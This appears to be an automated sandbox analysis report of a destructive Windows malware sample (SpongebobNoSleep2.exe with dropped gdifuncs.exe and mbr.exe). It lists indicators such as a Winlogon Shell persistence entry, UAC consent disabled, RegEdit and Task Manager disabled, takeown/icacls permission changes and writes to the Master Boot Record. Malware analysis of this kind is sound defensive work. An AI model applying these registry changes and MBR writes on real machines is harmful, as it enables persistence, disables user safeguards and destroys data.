Analysis
-
max time kernel
507s -
max time network
515s -
platform
windows10-2004_x64 -
resource
win10v2004-20240611-en -
resource tags
arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system -
submitted
03-07-2024 04:59
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
http://google.com
Resource
win10v2004-20240611-en
Errors
General
-
Target
http://google.com
Malware Config
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
Processes:
gdifuncs.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, wscript.exe \"C:\\windows\\winbase_base_procid_none\\secureloc0x65\\WinRapistI386.vbs\"" gdifuncs.exe -
Processes:
gdifuncs.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" gdifuncs.exe -
Disables RegEdit via registry modification 1 IoCs
Processes:
gdifuncs.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" gdifuncs.exe -
Disables Task Manager via registry modification
-
Possible privilege escalation attempt 4 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exepid process 5076 takeown.exe 1460 icacls.exe 1396 takeown.exe 4048 icacls.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
wscript.exegdifuncs.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation gdifuncs.exe -
Executes dropped EXE 3 IoCs
Processes:
mbr.exeMainWindow.exegdifuncs.exepid process 524 mbr.exe 816 MainWindow.exe 2408 gdifuncs.exe -
Modifies file permissions 1 TTPs 4 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exepid process 5076 takeown.exe 1460 icacls.exe 1396 takeown.exe 4048 icacls.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
Processes:
flow ioc 282 camo.githubusercontent.com 283 camo.githubusercontent.com 287 camo.githubusercontent.com 300 raw.githubusercontent.com 301 raw.githubusercontent.com 302 raw.githubusercontent.com -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:
mbr.exedescription ioc process File opened for modification \??\PhysicalDrive0 mbr.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\Desktop\Wallpaper = "c:\\bg.bmp" reg.exe -
Drops file in Windows directory 6 IoCs
Processes:
cmd.exegdifuncs.execmd.exedescription ioc process File created \??\c:\windows\winbase_base_procid_none\secureloc0x65\gdifuncs.exe cmd.exe File opened for modification \??\c:\windows\winbase_base_procid_none\secureloc0x65\gdifuncs.exe cmd.exe File created \??\c:\windows\winbase_base_procid_none\secureloc0x65\mainbgtheme.wav cmd.exe File opened for modification \??\c:\windows\winbase_base_procid_none\secureloc0x65\mainbgtheme.wav cmd.exe File created C:\windows\WinAttr.gci gdifuncs.exe File opened for modification \??\c:\windows\WinAttr.gci cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 2080 timeout.exe -
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 4744 taskkill.exe -
Modifies Control Panel 3 IoCs
Processes:
gdifuncs.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\Cursors\Arrow = "C:\\Windows\\winbase_base_procid_none\\secureloc0x65\\rcur.cur" gdifuncs.exe Set value (str) \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\winbase_base_procid_none\\secureloc0x65\\rcur.cur" gdifuncs.exe Set value (str) \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\Cursors\Hand = "C:\\Windows\\winbase_base_procid_none\\secureloc0x65\\rcur.cur" gdifuncs.exe -
Modifies registry class 1 IoCs
Processes:
msedge.exedescription ioc process Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3665033694-1447845302-680750983-1000\{AD0C075B-9A33-4142-9876-1601B4A20A80} msedge.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
gdifuncs.exepid process 2408 gdifuncs.exe 2408 gdifuncs.exe 2408 gdifuncs.exe 2408 gdifuncs.exe 2408 gdifuncs.exe 2408 gdifuncs.exe 2408 gdifuncs.exe 2408 gdifuncs.exe 2408 gdifuncs.exe 2408 gdifuncs.exe 2408 gdifuncs.exe 2408 gdifuncs.exe 2408 gdifuncs.exe 2408 gdifuncs.exe 2408 gdifuncs.exe 2408 gdifuncs.exe 2408 gdifuncs.exe 2408 gdifuncs.exe 2408 gdifuncs.exe 2408 gdifuncs.exe 2408 gdifuncs.exe 2408 gdifuncs.exe 2408 gdifuncs.exe 2408 gdifuncs.exe 2408 gdifuncs.exe 2408 gdifuncs.exe 2408 gdifuncs.exe 2408 gdifuncs.exe 2408 gdifuncs.exe 2408 gdifuncs.exe 2408 gdifuncs.exe 2408 gdifuncs.exe 2408 gdifuncs.exe 2408 gdifuncs.exe 2408 gdifuncs.exe 2408 gdifuncs.exe 2408 gdifuncs.exe 2408 gdifuncs.exe 2408 gdifuncs.exe 2408 gdifuncs.exe 2408 gdifuncs.exe 2408 gdifuncs.exe 2408 gdifuncs.exe 2408 gdifuncs.exe 2408 gdifuncs.exe 2408 gdifuncs.exe 2408 gdifuncs.exe 2408 gdifuncs.exe 2408 gdifuncs.exe 2408 gdifuncs.exe 2408 gdifuncs.exe 2408 gdifuncs.exe 2408 gdifuncs.exe 2408 gdifuncs.exe 2408 gdifuncs.exe 2408 gdifuncs.exe 2408 gdifuncs.exe 2408 gdifuncs.exe 2408 gdifuncs.exe 2408 gdifuncs.exe 2408 gdifuncs.exe 2408 gdifuncs.exe 2408 gdifuncs.exe 2408 gdifuncs.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
AUDIODG.EXEgdifuncs.exetakeown.exetakeown.exetaskkill.exedescription pid process Token: 33 3408 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 3408 AUDIODG.EXE Token: SeDebugPrivilege 2408 gdifuncs.exe Token: SeDebugPrivilege 2408 gdifuncs.exe Token: SeTakeOwnershipPrivilege 5076 takeown.exe Token: SeTakeOwnershipPrivilege 1396 takeown.exe Token: SeDebugPrivilege 4744 taskkill.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
MainWindow.exepid process 816 MainWindow.exe 816 MainWindow.exe 816 MainWindow.exe 816 MainWindow.exe 816 MainWindow.exe 816 MainWindow.exe 816 MainWindow.exe 816 MainWindow.exe 816 MainWindow.exe 816 MainWindow.exe 816 MainWindow.exe 816 MainWindow.exe 816 MainWindow.exe 816 MainWindow.exe 816 MainWindow.exe 816 MainWindow.exe 816 MainWindow.exe 816 MainWindow.exe 816 MainWindow.exe 816 MainWindow.exe 816 MainWindow.exe 816 MainWindow.exe 816 MainWindow.exe 816 MainWindow.exe 816 MainWindow.exe 816 MainWindow.exe 816 MainWindow.exe 816 MainWindow.exe 816 MainWindow.exe 816 MainWindow.exe 816 MainWindow.exe 816 MainWindow.exe 816 MainWindow.exe 816 MainWindow.exe 816 MainWindow.exe 816 MainWindow.exe 816 MainWindow.exe 816 MainWindow.exe 816 MainWindow.exe 816 MainWindow.exe 816 MainWindow.exe 816 MainWindow.exe 816 MainWindow.exe 816 MainWindow.exe 816 MainWindow.exe 816 MainWindow.exe 816 MainWindow.exe 816 MainWindow.exe 816 MainWindow.exe 816 MainWindow.exe 816 MainWindow.exe 816 MainWindow.exe 816 MainWindow.exe 816 MainWindow.exe 816 MainWindow.exe 816 MainWindow.exe 816 MainWindow.exe 816 MainWindow.exe 816 MainWindow.exe 816 MainWindow.exe 816 MainWindow.exe 816 MainWindow.exe 816 MainWindow.exe 816 MainWindow.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
SpongebobNoSleep2.exeMainWindow.exepid process 3444 SpongebobNoSleep2.exe 816 MainWindow.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
SpongebobNoSleep2.exewscript.execmd.exedescription pid process target process PID 3444 wrote to memory of 1556 3444 SpongebobNoSleep2.exe wscript.exe PID 3444 wrote to memory of 1556 3444 SpongebobNoSleep2.exe wscript.exe PID 1556 wrote to memory of 524 1556 wscript.exe mbr.exe PID 1556 wrote to memory of 524 1556 wscript.exe mbr.exe PID 1556 wrote to memory of 524 1556 wscript.exe mbr.exe PID 1556 wrote to memory of 60 1556 wscript.exe cmd.exe PID 1556 wrote to memory of 60 1556 wscript.exe cmd.exe PID 60 wrote to memory of 2392 60 cmd.exe reg.exe PID 60 wrote to memory of 2392 60 cmd.exe reg.exe PID 60 wrote to memory of 452 60 cmd.exe rundll32.exe PID 60 wrote to memory of 452 60 cmd.exe rundll32.exe PID 60 wrote to memory of 980 60 cmd.exe rundll32.exe PID 60 wrote to memory of 980 60 cmd.exe rundll32.exe PID 60 wrote to memory of 4244 60 cmd.exe rundll32.exe PID 60 wrote to memory of 4244 60 cmd.exe rundll32.exe PID 60 wrote to memory of 3284 60 cmd.exe rundll32.exe PID 60 wrote to memory of 3284 60 cmd.exe rundll32.exe PID 60 wrote to memory of 4440 60 cmd.exe rundll32.exe PID 60 wrote to memory of 4440 60 cmd.exe rundll32.exe PID 60 wrote to memory of 3388 60 cmd.exe rundll32.exe PID 60 wrote to memory of 3388 60 cmd.exe rundll32.exe PID 60 wrote to memory of 5104 60 cmd.exe rundll32.exe PID 60 wrote to memory of 5104 60 cmd.exe rundll32.exe PID 60 wrote to memory of 5084 60 cmd.exe rundll32.exe PID 60 wrote to memory of 5084 60 cmd.exe rundll32.exe PID 60 wrote to memory of 3712 60 cmd.exe rundll32.exe PID 60 wrote to memory of 3712 60 cmd.exe rundll32.exe PID 60 wrote to memory of 1512 60 cmd.exe rundll32.exe PID 60 wrote to memory of 1512 60 cmd.exe rundll32.exe PID 60 wrote to memory of 4348 60 cmd.exe rundll32.exe PID 60 wrote to memory of 4348 60 cmd.exe rundll32.exe PID 60 wrote to memory of 3272 60 cmd.exe rundll32.exe PID 60 wrote to memory of 3272 60 cmd.exe rundll32.exe PID 60 wrote to memory of 2864 60 cmd.exe rundll32.exe PID 60 wrote to memory of 2864 60 cmd.exe rundll32.exe PID 60 wrote to memory of 996 60 cmd.exe rundll32.exe PID 60 wrote to memory of 996 60 cmd.exe rundll32.exe PID 60 wrote to memory of 1000 60 cmd.exe rundll32.exe PID 60 wrote to memory of 1000 60 cmd.exe rundll32.exe PID 60 wrote to memory of 3752 60 cmd.exe rundll32.exe PID 60 wrote to memory of 3752 60 cmd.exe rundll32.exe PID 60 wrote to memory of 4276 60 cmd.exe rundll32.exe PID 60 wrote to memory of 4276 60 cmd.exe rundll32.exe PID 60 wrote to memory of 1600 60 cmd.exe rundll32.exe PID 60 wrote to memory of 1600 60 cmd.exe rundll32.exe PID 60 wrote to memory of 4584 60 cmd.exe rundll32.exe PID 60 wrote to memory of 4584 60 cmd.exe rundll32.exe PID 60 wrote to memory of 3816 60 cmd.exe rundll32.exe PID 60 wrote to memory of 3816 60 cmd.exe rundll32.exe PID 60 wrote to memory of 2716 60 cmd.exe rundll32.exe PID 60 wrote to memory of 2716 60 cmd.exe rundll32.exe PID 60 wrote to memory of 3532 60 cmd.exe rundll32.exe PID 60 wrote to memory of 3532 60 cmd.exe rundll32.exe PID 60 wrote to memory of 2620 60 cmd.exe rundll32.exe PID 60 wrote to memory of 2620 60 cmd.exe rundll32.exe PID 60 wrote to memory of 2748 60 cmd.exe rundll32.exe PID 60 wrote to memory of 2748 60 cmd.exe rundll32.exe PID 60 wrote to memory of 3520 60 cmd.exe rundll32.exe PID 60 wrote to memory of 3520 60 cmd.exe rundll32.exe PID 60 wrote to memory of 2268 60 cmd.exe rundll32.exe PID 60 wrote to memory of 2268 60 cmd.exe rundll32.exe PID 60 wrote to memory of 5020 60 cmd.exe rundll32.exe PID 60 wrote to memory of 5020 60 cmd.exe rundll32.exe PID 60 wrote to memory of 1444 60 cmd.exe rundll32.exe -
System policy modification 1 TTPs 1 IoCs
Processes:
gdifuncs.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" gdifuncs.exe
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.com1⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --field-trial-handle=4276,i,10925946972013221578,8820669985803190952,262144 --variations-seed-version --mojo-platform-channel-handle=3836 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --field-trial-handle=4340,i,10925946972013221578,8820669985803190952,262144 --variations-seed-version --mojo-platform-channel-handle=4496 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --field-trial-handle=4100,i,10925946972013221578,8820669985803190952,262144 --variations-seed-version --mojo-platform-channel-handle=5300 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=5472,i,10925946972013221578,8820669985803190952,262144 --variations-seed-version --mojo-platform-channel-handle=5484 /prefetch:81⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --field-trial-handle=5356,i,10925946972013221578,8820669985803190952,262144 --variations-seed-version --mojo-platform-channel-handle=5564 /prefetch:81⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --field-trial-handle=5912,i,10925946972013221578,8820669985803190952,262144 --variations-seed-version --mojo-platform-channel-handle=5932 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --field-trial-handle=5512,i,10925946972013221578,8820669985803190952,262144 --variations-seed-version --mojo-platform-channel-handle=4992 /prefetch:81⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --field-trial-handle=1308,i,10925946972013221578,8820669985803190952,262144 --variations-seed-version --mojo-platform-channel-handle=4656 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --field-trial-handle=6448,i,10925946972013221578,8820669985803190952,262144 --variations-seed-version --mojo-platform-channel-handle=6336 /prefetch:81⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --field-trial-handle=5752,i,10925946972013221578,8820669985803190952,262144 --variations-seed-version --mojo-platform-channel-handle=5668 /prefetch:81⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --field-trial-handle=5496,i,10925946972013221578,8820669985803190952,262144 --variations-seed-version --mojo-platform-channel-handle=6340 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --field-trial-handle=6164,i,10925946972013221578,8820669985803190952,262144 --variations-seed-version --mojo-platform-channel-handle=6748 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --field-trial-handle=6864,i,10925946972013221578,8820669985803190952,262144 --variations-seed-version --mojo-platform-channel-handle=6896 /prefetch:81⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --field-trial-handle=3860,i,10925946972013221578,8820669985803190952,262144 --variations-seed-version --mojo-platform-channel-handle=6892 /prefetch:81⤵
- Modifies registry class
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --field-trial-handle=6884,i,10925946972013221578,8820669985803190952,262144 --variations-seed-version --mojo-platform-channel-handle=6620 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --field-trial-handle=7124,i,10925946972013221578,8820669985803190952,262144 --variations-seed-version --mojo-platform-channel-handle=7036 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --field-trial-handle=6308,i,10925946972013221578,8820669985803190952,262144 --variations-seed-version --mojo-platform-channel-handle=7020 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --field-trial-handle=6888,i,10925946972013221578,8820669985803190952,262144 --variations-seed-version --mojo-platform-channel-handle=7016 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=33 --field-trial-handle=3820,i,10925946972013221578,8820669985803190952,262144 --variations-seed-version --mojo-platform-channel-handle=4684 /prefetch:11⤵
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x4e0 0x3241⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --field-trial-handle=6724,i,10925946972013221578,8820669985803190952,262144 --variations-seed-version --mojo-platform-channel-handle=7016 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=35 --field-trial-handle=7048,i,10925946972013221578,8820669985803190952,262144 --variations-seed-version --mojo-platform-channel-handle=1040 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --field-trial-handle=7336,i,10925946972013221578,8820669985803190952,262144 --variations-seed-version --mojo-platform-channel-handle=7348 /prefetch:81⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=37 --field-trial-handle=6856,i,10925946972013221578,8820669985803190952,262144 --variations-seed-version --mojo-platform-channel-handle=7456 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --lang=en-US --service-sandbox-type=service --field-trial-handle=7628,i,10925946972013221578,8820669985803190952,262144 --variations-seed-version --mojo-platform-channel-handle=7640 /prefetch:81⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --field-trial-handle=7880,i,10925946972013221578,8820669985803190952,262144 --variations-seed-version --mojo-platform-channel-handle=7908 /prefetch:81⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=40 --field-trial-handle=7968,i,10925946972013221578,8820669985803190952,262144 --variations-seed-version --mojo-platform-channel-handle=6452 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --lang=en-US --service-sandbox-type=service --field-trial-handle=7992,i,10925946972013221578,8820669985803190952,262144 --variations-seed-version --mojo-platform-channel-handle=7912 /prefetch:81⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --field-trial-handle=8120,i,10925946972013221578,8820669985803190952,262144 --variations-seed-version --mojo-platform-channel-handle=8108 /prefetch:81⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=43 --field-trial-handle=8096,i,10925946972013221578,8820669985803190952,262144 --variations-seed-version --mojo-platform-channel-handle=7344 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --lang=en-US --service-sandbox-type=service --field-trial-handle=7524,i,10925946972013221578,8820669985803190952,262144 --variations-seed-version --mojo-platform-channel-handle=7736 /prefetch:81⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --field-trial-handle=8044,i,10925946972013221578,8820669985803190952,262144 --variations-seed-version --mojo-platform-channel-handle=7600 /prefetch:81⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=46 --field-trial-handle=8004,i,10925946972013221578,8820669985803190952,262144 --variations-seed-version --mojo-platform-channel-handle=7100 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --lang=en-US --service-sandbox-type=service --field-trial-handle=8156,i,10925946972013221578,8820669985803190952,262144 --variations-seed-version --mojo-platform-channel-handle=8108 /prefetch:81⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --field-trial-handle=7660,i,10925946972013221578,8820669985803190952,262144 --variations-seed-version --mojo-platform-channel-handle=8104 /prefetch:81⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=49 --field-trial-handle=8100,i,10925946972013221578,8820669985803190952,262144 --variations-seed-version --mojo-platform-channel-handle=5596 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=50 --field-trial-handle=5620,i,10925946972013221578,8820669985803190952,262144 --variations-seed-version --mojo-platform-channel-handle=8160 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=51 --field-trial-handle=7572,i,10925946972013221578,8820669985803190952,262144 --variations-seed-version --mojo-platform-channel-handle=8132 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=52 --field-trial-handle=5308,i,10925946972013221578,8820669985803190952,262144 --variations-seed-version --mojo-platform-channel-handle=7580 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --lang=en-US --service-sandbox-type=service --field-trial-handle=7560,i,10925946972013221578,8820669985803190952,262144 --variations-seed-version --mojo-platform-channel-handle=5640 /prefetch:81⤵
-
